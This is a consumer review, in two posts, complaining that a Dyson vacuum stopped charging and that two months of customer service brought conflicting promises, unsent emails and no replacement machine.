Our very expensive dyson vacuum stopped charging about 2 months ago and have been dealing with customer support for 2 months with no progress! they keep saying how sorry they are and how they understand how I feel but nothing gets done! I have had to call them 4 times and email them multiple times (they never respond to my email!). I have been told by different people over the last 2 months that I am getting a refurbished machine, then they said I was getting a new machine and now they are saying a I am getting a refurbished machine again BUT STILL NO MACHINE! they said they had the wrong address but never reached out to get my address and when I checked I sent them my correct address 6 weeks ago and they never bothered to contact me to tell me they had the wrong address (which they didnt). I think they are just giving me the run around. Now they are saying I am getting a refurbished machine but it will take 5 business days for them to send me a box to put my vacuum in to send back and then they have to assess it and then it will take 15 business days to get the refurbished one. This is ridiculous. Oh and I spoke with them again today and they said they would email me the details of what is happening and still no email. HORRIBLE PRODUCT and WORSE CUSTOMER SERVICE. I will never buy their products again and will certainly tell people about my experience!

this is issue is not resolved! They have not been in touch with me. I’ve had to contact them. I contacted them yesterday again for the fourth time and they said they would be sending me an email with the details of what’s to happen next and the details about when I would be getting my new vacuum. I have still not received the email and this is about the third time that they have said that over the last two months. So no this issue is not resolved. Customer care is terrible as I said in my previous review and this issue is not resolved. I’ll be calling them again today. This company is horrible to deal with.
